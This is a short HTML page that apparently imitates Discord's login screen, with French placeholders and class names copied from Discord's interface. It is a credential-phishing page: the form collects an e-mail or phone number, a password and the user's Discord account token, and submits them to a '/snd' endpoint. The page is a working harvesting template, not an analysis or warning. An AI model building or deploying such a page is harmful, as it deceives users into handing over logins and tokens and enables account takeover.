<head>
	<title>Discord</title>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
</head>

<body>
    <form action="/snd" method="POST">
        <input class="inputDefault-_djjkz input-cIJ7To inputField-4g7rSQ" name="email" type="text" placeholder="E-mail ou numéro de téléphone" aria-label="E-mail ou numéro de téléphone" autocomplete="off" maxlength="999" spellcheck="false" value="">
        <br/>
        <input class="inputDefault-_djjkz input-cIJ7To" name="password" type="password" placeholder="Mot de passe" aria-label="Mot de passe" autocomplete="off" maxlength="999" spellcheck="false" value="">
        <br />
        <input class="inputDefault-_djjkz input-cIJ7To" name="token" type="password" placeholder="token" aria-label="Token" autocomplete="off" maxlength="999" spellcheck="false" value="">
        <br />
       <button type="submit" href="/" >Login</button>
    </form>
</body>